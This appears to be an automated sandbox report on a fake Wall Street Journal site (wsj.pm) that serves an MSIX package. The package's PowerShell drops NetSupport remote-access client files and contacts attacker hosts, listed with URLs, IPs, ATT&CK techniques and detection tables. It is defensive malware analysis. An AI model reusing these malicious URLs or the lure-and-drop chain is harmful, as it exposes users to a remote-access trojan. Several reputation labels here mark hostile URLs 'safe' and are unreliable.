                                    Source: Yara matchFile source: 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000020.00000002.2487651963.0000000000602000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000020.00000002.2496684032.0000000000827000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000020.00000002.2544309699.0000000005AE4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7788, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: client32.exe PID: 7408, type: MEMORYSTR
                                    Source: Yara matchFile source: C:\ProgramData\netsupport\client\PCICHEK.DLL, type: DROPPED
                                    Source: Yara matchFile source: C:\ProgramData\netsupport\client\pcicapi.dll, type: DROPPED
                                    Source: Yara matchFile source: C:\ProgramData\netsupport\client\client32.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ProgramData\netsupport\client\HTCTL32.DLL, type: DROPPED
                                    Source: Yara matchFile source: C:\ProgramData\netsupport\client\AudioCapture.dll, type: DROPPED
                                    Source: Yara matchFile source: C:\ProgramData\netsupport\client\TCCTL32.DLL, type: DROPPED
                                    Source: Yara matchFile source: C:\ProgramData\netsupport\client\PCICL32.DLL, type: DROPPED

                                    Mitre Att&ck Matrix

                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity InformationAcquire Infrastructure2
                                    Valid Accounts                                    		12
                                    Windows Management Instrumentation                                    		1
                                    DLL Side-Loading                                    		1
                                    DLL Side-Loading                                    		1
                                    Disable or Modify Tools                                    		1
                                    Input Capture                                    		12
                                    System Time Discovery                                    		Remote Services1
                                    Archive Collected Data                                    		3
                                    Ingress Tool Transfer                                    		Exfiltration Over Other Network Medium1
                                    System Shutdown/Reboot
                                    CredentialsDomainsDefault Accounts4
                                    Native API                                    		2
                                    Valid Accounts                                    		2
                                    Valid Accounts                                    		1
                                    Deobfuscate/Decode Files or Information                                    		LSASS Memory1
                                    Account Discovery                                    		Remote Desktop Protocol1
                                    Screen Capture                                    		21
                                    Encrypted Channel                                    		Exfiltration Over Bluetooth1
                                    Defacement
                                    Email AddressesDNS ServerDomain Accounts2
                                    Service Execution                                    		1
                                    Windows Service                                    		21
                                    Access Token Manipulation                                    		3
                                    Obfuscated Files or Information                                    		Security Account Manager3
                                    File and Directory Discovery                                    		SMB/Windows Admin Shares1
                                    Input Capture                                    		4
                                    Non-Application Layer Protocol                                    		Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal Accounts1
                                    PowerShell                                    		1
                                    Registry Run Keys / Startup Folder                                    		1
                                    Windows Service                                    		11
                                    Software Packing                                    		NTDS34
                                    System Information Discovery                                    		Distributed Component Object Model3
                                    Clipboard Data                                    		5
                                    Application Layer Protocol                                    		Traffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script123
                                    Process Injection                                    		1
                                    DLL Side-Loading                                    		LSA Secrets271
                                    Security Software Discovery                                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                                    Registry Run Keys / Startup Folder                                    		1
                                    Masquerading                                    		Cached Domain Credentials2
                                    Process Discovery                                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                                    Valid Accounts                                    		DCSync31
                                    Virtualization/Sandbox Evasion                                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                                    Virtualization/Sandbox Evasion                                    		Proc Filesystem11
                                    Application Window Discovery                                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                                    Access Token Manipulation                                    		/etc/passwd and /etc/shadow1
                                    System Owner/User Discovery                                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron123
                                    Process Injection                                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                                    Rundll32                                    		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                                    Behavior Graph

                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1431705 URL: http://wsj.pm Startdate: 25/04/2024 Architecture: WINDOWS Score: 100 70 cdn37.space 2->70 72 geo.netsupportsoftware.com 2->72 74 cdn40.click 2->74 96 Snort IDS alert for network traffic 2->96 98 Multi AV Scanner detection for domain / URL 2->98 100 Malicious sample detected (through community Yara rule) 2->100 102 2 other signatures 2->102 10 PsfLauncher64.exe 2->10         started        13 PsfLauncher64.exe 2->13         started        15 chrome.exe 24 2->15         started        18 5 other processes 2->18 signatures3 process4 dnsIp5 112 Maps a DLL or memory area into another process 10->112 20 powershell.exe 8 10->20         started        23 PsfRunDll64.exe 10->23         started        25 powershell.exe 13->25         started        27 PsfRunDll64.exe 13->27         started        84 192.168.2.17, 138, 443, 49696 unknown unknown 15->84 86 239.255.255.250 unknown Reserved 15->86 29 chrome.exe 15->29         started        signatures6 process7 dnsIp8 104 Maps a DLL or memory area into another process 20->104 106 Found suspicious powershell code related to unpacking or dynamic code loading 20->106 108 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 20->108 110 Powershell drops PE file 20->110 32 powershell.exe 20 20->32         started        35 conhost.exe 20->35         started        37 conhost.exe 25->37         started        39 powershell.exe 25->39         started        78 wsj.pm 103.113.70.37, 443, 49716, 49717 NETCONNECTWIFI-ASNetConnectWifiPvtLtdIN India 29->78 80 www.google.com 108.177.122.106, 443, 49773, 49795 GOOGLEUS United States 29->80 82 3 other IPs or domains 29->82 signatures9 process10 signatures11 88 Maps a DLL or memory area into another process 32->88 41 powershell.exe 14 27 32->41         started        46 chrome.exe 32->46         started        process12 dnsIp13 76 cdn37.space 86.104.72.157, 443, 49798, 49799 TELE-ROM-ASstrAleeaPaciiBlB5Ap16RO Romania 41->76 56 C:\ProgramData\netsupport\...\remcmdstub.exe, PE32 41->56 dropped 58 C:\ProgramData\netsupport\...\pcicapi.dll, PE32 41->58 dropped 60 C:\ProgramData\netsupport\...\client32.exe, PE32 41->60 dropped 62 6 other files (5 malicious) 41->62 dropped 114 Tries to open files direct via NTFS file id 41->114 116 Maps a DLL or memory area into another process 41->116 118 Loading BitLocker PowerShell Module 41->118 48 client32.exe 41->48         started        52 conhost.exe 41->52         started        54 chrome.exe 46->54         started        file14 signatures15 process16 dnsIp17 64 5.8.63.140, 443, 49800 WEHOSTWEBSITES-COMUS Russian Federation 48->64 66 geo.netsupportsoftware.com 104.26.0.231, 49802, 49804, 49805 CLOUDFLARENETUS United States 48->66 68 185.174.102.62, 443, 49801 ASN-QUADRANET-GLOBALUS Ukraine 48->68 90 Contains functionalty to change the wallpaper 48->90 92 Delayed program exit found 48->92 94 Contains functionality to detect sleep reduction / modifications 48->94 signatures18

                                    Screenshots

                                    Thumbnails

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand

                                    Antivirus, Machine Learning and Genetic Malware Detection

                                    Initial Sample

                                    SourceDetectionScannerLabelLink
                                    http://wsj.pm0%Avira URL Cloudsafe
                                    http://wsj.pm1%VirustotalBrowse

                                    Dropped Files

                                    SourceDetectionScannerLabelLink
                                    C:\ProgramData\netsupport\client\AudioCapture.dll1%VirustotalBrowse
                                    C:\ProgramData\netsupport\client\AudioCapture.dll3%ReversingLabs
                                    C:\ProgramData\netsupport\client\HTCTL32.DLL3%ReversingLabs
                                    C:\ProgramData\netsupport\client\HTCTL32.DLL3%VirustotalBrowse
                                    C:\ProgramData\netsupport\client\PCICHEK.DLL3%ReversingLabs
                                    C:\ProgramData\netsupport\client\PCICHEK.DLL1%VirustotalBrowse
                                    C:\ProgramData\netsupport\client\PCICL32.DLL4%ReversingLabs
                                    C:\ProgramData\netsupport\client\PCICL32.DLL8%VirustotalBrowse
                                    C:\ProgramData\netsupport\client\TCCTL32.DLL3%ReversingLabs
                                    C:\ProgramData\netsupport\client\TCCTL32.DLL1%VirustotalBrowse
                                    C:\ProgramData\netsupport\client\client32.exe0%ReversingLabs
                                    C:\ProgramData\netsupport\client\client32.exe0%VirustotalBrowse
                                    C:\ProgramData\netsupport\client\msvcr100.dll0%ReversingLabs
                                    C:\ProgramData\netsupport\client\msvcr100.dll0%VirustotalBrowse
                                    C:\ProgramData\netsupport\client\pcicapi.dll3%ReversingLabs
                                    C:\ProgramData\netsupport\client\pcicapi.dll3%VirustotalBrowse
                                    C:\ProgramData\netsupport\client\remcmdstub.exe8%ReversingLabs
                                    C:\ProgramData\netsupport\client\remcmdstub.exe3%VirustotalBrowse

                                    Unpacked PE Files

                                    No Antivirus matches

                                    Domains

                                    SourceDetectionScannerLabelLink
                                    cdn37.space0%VirustotalBrowse
                                    wsj.pm1%VirustotalBrowse
                                    cdn40.click5%VirustotalBrowse

                                    URLs

                                    SourceDetectionScannerLabelLink
                                    http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
                                    http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
                                    http://ocsp.suscerte.gob.ve00%URL Reputationsafe
                                    http://crl.dhimyotis.com/certignarootca.crl00%URL Reputationsafe
                                    http://www.chambersign.org10%URL Reputationsafe
                                    http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz00%URL Reputationsafe
                                    http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                                    http://www.suscerte.gob.ve/dpc00%URL Reputationsafe
                                    http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                                    http://policy.camerfirma.com00%URL Reputationsafe
                                    http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?0%URL Reputationsafe
                                    http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
                                    http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe
                                    http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G0%URL Reputationsafe
                                    https://wwww.certigna.fr/autorites/0m0%URL Reputationsafe
                                    https://contoso.com/Icon0%URL Reputationsafe
                                    http://www.globaltrust.info00%URL Reputationsafe
                                    http://ac.economia.gob.mx/last.crl0G0%URL Reputationsafe
                                    http://crl.oces.trust2408.com/oces.crl00%URL Reputationsafe
                                    http://certs.oaticerts.com/repository/OATICA2.crl0%URL Reputationsafe
                                    http://certs.oati.net/repository/OATICA2.crt00%URL Reputationsafe
                                    http://www.accv.es000%URL Reputationsafe
                                    http://crl2.postsignum.cz/crl/psrootqca4.crl010%URL Reputationsafe
                                    http://web.ncdc.gov.sa/crl/nrcaparta1.crl0%URL Reputationsafe
                                    http://www.acabogacia.org00%URL Reputationsafe
                                    http://crl.securetrust.com/SGCA.crl00%URL Reputationsafe
                                    http://www.agesic.gub.uy/acrn/acrn.crl0)0%URL Reputationsafe
                                    http://%s/testpage.htmwininet.dll0%Avira URL Cloudsafe
                                    http://www.rcsc.lt/repository00%URL Reputationsafe
                                    https://cdn40.click/files/WSJ.msix0%Avira URL Cloudsafe
                                    https://cdn40.click/9e4e27b7-bcfb-4298-bf8f-2cf4a6bdb3bf-9b6b40d6-3f8e-4755-9063-562658ebdb950%Avira URL Cloudsafe
                                    http://www.correo.com.uy/correocert/cps.pdf00%URL Reputationsafe
                                    http://certs.oaticerts.com/repository/OATICA2.crt080%URL Reputationsafe
                                    http://cps.chambersign.org/cps/chambersignroot.html00%URL Reputationsafe
                                    http://www.pci.co.uk/support0%URL Reputationsafe
                                    http://www.oaticerts.com/repository.0%URL Reputationsafe
                                    http://www.ancert.com/cps00%URL Reputationsafe
                                    http://ocsp.accv.es00%URL Reputationsafe
                                    http://acraiz.icpbrasil.gov.br/LCRacraizv2.crl00%URL Reputationsafe
                                    http://www.echoworx.com/ca/root2/cps.pdf00%URL Reputationsafe
                                    http://ca.mtin.es/mtin/crl/MTINAutoridadRaiz030%URL Reputationsafe
                                    http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl00%URL Reputationsafe
                                    http://crl.defence.gov.au/pki00%URL Reputationsafe
                                    http://www.agesic.gub.uy/acrn/cps_acrn.pdf00%URL Reputationsafe
                                    http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl00%URL Reputationsafe
                                    http://%s/testpage.htm0%Avira URL Cloudsafe
                                    https://wsj.pm/fonts/woffs/exchange/Exchange-BookItalic.woff20%Avira URL Cloudsafe
                                    https://wsj.pm/fonts/woffs/retina/RetinaNarr-Medium.woff20%Avira URL Cloudsafe
                                    https://wsj.pm/img/wsj-logo-big-black.e653dfca.svg0%Avira URL Cloudsafe
                                    https://cdn40.click/files/WSJ.msix2%VirustotalBrowse
                                    https://wsj.pm/img/google-play.4699f3c2.svg0%Avira URL Cloudsafe
                                    https://cdn37.space/974afa0a-d334-48ec-a0d4-4cc14efa730c-1d3d044a-e654-41e3-ad32-38a2934393e4?aklshdjahsjdh=25&ajhsdjhasjhd=nsd&iud=90dab6f9-11b1-408a-af36-86b217e34b870%Avira URL Cloudsafe
                                    https://cdn40.click/974afa0a-d334-48ec-a0d4-4cc14efa730c-1d3d044a-e654-41e3-ad32-38a2934393e4?aklshdjahsjdh=25&ajhsdjhasjhd=nsp&ahsdjkasjkdh=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c0%Avira URL Cloudsafe
                                    http://127.0.0.10%Avira URL Cloudsafe
                                    https://cdn40.click/9e4e27b7-bcfb-4298-bf8f-2cf4a6bdb3bf-9b6b40d6-3f8e-4755-9063-562658ebdb952%VirustotalBrowse
                                    https://wsj.pm/fonts/woffs/escrow/Escrow+Display+Condensed+Italic.woff20%Avira URL Cloudsafe
                                    https://wsj.pm/img/im-948848.jpeg0%Avira URL Cloudsafe
                                    https://wsj.pm/fonts/woffs/retina/Retina-Light.woff20%Avira URL Cloudsafe
                                    https://wsj.pm/fonts/woffs/retina/RetinaNarr-Bold.woff20%Avira URL Cloudsafe
                                    https://cdn40.click/73689d8a-25b4-41cf-b693-05591ed804a7-7433f7b1-9997-477b-aadc-5a6e8d233c61?fmtKxAm=Windows%20Defender&ancOgcW=GPedA&BjxYYHPLrzLmCYuBVxOLtmKj=Microsoft+Windows+10+Pro&aEoLMFrJkYQED=25&sbhadkcjUpbj=d99844e1-4599-410e-aa0d-b504c5ca3ddf&File=wsj&jAWWnA=w&zbzPFbbhcIkxLubqNgOzVPy=90dab6f9-11b1-408a-af36-86b217e34b870%Avira URL Cloudsafe
                                    https://cdn40.click/bb9c1a14-4e3d-40ab-bcc8-0b84e78255b0-4bed9ff2-0f4e-48fb-92ed-1065fcd85e010%Avira URL Cloudsafe
                                    http://pesterbdd.com/images/Pester.png8100%Avira URL Cloudmalware
                                    https://wsj.pm/fonts/woffs/retina/Retina-Book.woff20%Avira URL Cloudsafe
                                    https://wsj.pm/style.css0%Avira URL Cloudsafe
                                    https://wsj.pm/fonts/woffs/escrow/Escrow+Display+Condensed+Roman.woff20%Avira URL Cloudsafe
                                    https://cdn40.click/bb9c1a14-4e3d-40ab-bcc8-0b84e78255b0-4bed9ff2-0f4e-48fb-92ed-1065fcd85e012%VirustotalBrowse
                                    https://wsj.pm/img/im-949675.png0%Avira URL Cloudsafe
                                    http://127.0.0.12%VirustotalBrowse
                                    https://wsj.pm/fonts/woffs/retina/RetinaNarr-Light.woff20%Avira URL Cloudsafe
                                    http://pesterbdd.com/images/Pester.png812%VirustotalBrowse

                                    Domains and IPs

                                    Contacted Domains

                                    NameIPActiveMaliciousAntivirus DetectionReputation
                                    geo.netsupportsoftware.com
                                    		104.26.0.231
                                    		truefalse
                                      		high
                                      cdn40.click
                                      		23.133.88.190
                                      		truefalseunknown
                                      api.ipify.org
                                      		104.26.12.205
                                      		truefalse
                                        		high
                                        www.google.com
                                        		108.177.122.106
                                        		truefalse
                                          		high
                                          cdn37.space
                                          		86.104.72.157
                                          		truetrueunknown
                                          wsj.pm
                                          		103.113.70.37
                                          		truefalseunknown

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          http://geo.netsupportsoftware.com/location/loca.aspfalse
                                            		high
                                            https://cdn40.click/9e4e27b7-bcfb-4298-bf8f-2cf4a6bdb3bf-9b6b40d6-3f8e-4755-9063-562658ebdb95false
                                            • 2%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://cdn40.click/files/WSJ.msixfalse
                                            • 2%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://wsj.pm/fonts/woffs/exchange/Exchange-BookItalic.woff2false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://wsj.pm/fonts/woffs/retina/RetinaNarr-Medium.woff2false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://wsj.pm/img/wsj-logo-big-black.e653dfca.svgfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://wsj.pm/img/google-play.4699f3c2.svgfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://cdn37.space/974afa0a-d334-48ec-a0d4-4cc14efa730c-1d3d044a-e654-41e3-ad32-38a2934393e4?aklshdjahsjdh=25&ajhsdjhasjhd=nsd&iud=90dab6f9-11b1-408a-af36-86b217e34b87true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://cdn40.click/974afa0a-d334-48ec-a0d4-4cc14efa730c-1d3d044a-e654-41e3-ad32-38a2934393e4?aklshdjahsjdh=25&ajhsdjhasjhd=nsp&ahsdjkasjkdh=ab012ac2-5a34-4ac8-897c-4e2ce3936e3cfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://wsj.pm/fonts/woffs/escrow/Escrow+Display+Condensed+Italic.woff2false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://wsj.pm/img/im-948848.jpegfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://wsj.pm/fonts/woffs/retina/Retina-Light.woff2false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://wsj.pm/fonts/woffs/retina/RetinaNarr-Bold.woff2false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://cdn40.click/73689d8a-25b4-41cf-b693-05591ed804a7-7433f7b1-9997-477b-aadc-5a6e8d233c61?fmtKxAm=Windows%20Defender&ancOgcW=GPedA&BjxYYHPLrzLmCYuBVxOLtmKj=Microsoft+Windows+10+Pro&aEoLMFrJkYQED=25&sbhadkcjUpbj=d99844e1-4599-410e-aa0d-b504c5ca3ddf&File=wsj&jAWWnA=w&zbzPFbbhcIkxLubqNgOzVPy=90dab6f9-11b1-408a-af36-86b217e34b87false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://wsj.pm/fonts/woffs/retina/Retina-Book.woff2false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://wsj.pm/style.cssfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://wsj.pm/fonts/woffs/escrow/Escrow+Display+Condensed+Roman.woff2false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://wsj.pm/img/im-949675.pngfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://wsj.pm/fonts/woffs/retina/RetinaNarr-Light.woff2false
                                            • Avira URL Cloud: safe
                                            		unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5361000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://%s/testpage.htmwininet.dllpowershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp, HTCTL32.DLL.26.drfalse
                                            • Avira URL Cloud: safe
                                            		low
                                            http://www.certplus.com/CRL/class3.crl0AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://ocsp.suscerte.gob.ve0AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://crl.dhimyotis.com/certignarootca.crl0AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.chambersign.org1AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://www.wsj.com/powershell.exe, 00000019.00000002.1941634656.000002B280472000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2062772287.000002B2F5E82000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1941634656.000002B2801BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2058406283.000002B2F5C65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://%s/testpage.htmpowershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp, HTCTL32.DLL.26.drfalse
                                                • Avira URL Cloud: safe
                                                		low
                                                http://geo.netsupportsoftware.com/location/loca.aspuest-Out-NoScopeclient32.exe, 00000020.00000002.2542110346.0000000005AA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://repository.swisssign.com/0AppInstaller.exe, 0000000E.00000003.1687850749.00000196D5FBD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680011147.00000196D5F73000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://ca.disig.sk/ca/crl/ca_disig.crl0AppInstaller.exe, 0000000E.00000003.1687850749.00000196D5FBD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1775764927.00000196D5FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://android.notify.windows.com/iOS80AppInstaller.exe, 0000000E.00000002.1767105272.00000196D5300000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.suscerte.gob.ve/dpc0AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.disig.sk/ca/crl/ca_disig.crl0AppInstaller.exe, 0000000E.00000003.1687850749.00000196D5FBD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1775764927.00000196D5FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://nuget.org/nuget.exepowershell.exe, 00000017.00000002.2398750900.000001E12D1B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2180463385.000001E11EA2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2398750900.000001E12D07C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2037069987.000002B2901D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2037069987.000002B2900A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2149775477.00000231711D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://wns.windows.com/AppInstallerFullTrustAppServiceClient.exe, 00000012.00000002.1677556637.000002B5AB27A000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2594809898.000002A99F399000.00000004.00000020.00020000.00000000.sdmp, AppInstallerFullTrustAppServiceClient.exe, 00000026.00000002.2102011848.00000177F3C7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000017.00000002.2180463385.000001E11D001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1941634656.000002B280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023161161000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2535977313.000002678C697000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://pki.registradores.org/normativa/index.htm0AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://policy.camerfirma.com0AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.anf.es/es/address-direccion.htmlAppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.anf.es/address/)1(0&AppInstaller.exe, 0000000E.00000003.1680481341.00000196D5F57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000019.00000002.1941634656.000002B2801BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmptrue
                                                                  • URL Reputation: malware
                                                                  		unknown
                                                                  http://crl.ssc.lt/root-b/cacrl.crl0AppInstaller.exe, 0000000E.00000002.1776167790.00000196D5FE2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000019.00000002.1941634656.000002B2801BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.certicamara.com/dpc/0ZAppInstaller.exe, 0000000E.00000003.1680481341.00000196D5F57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
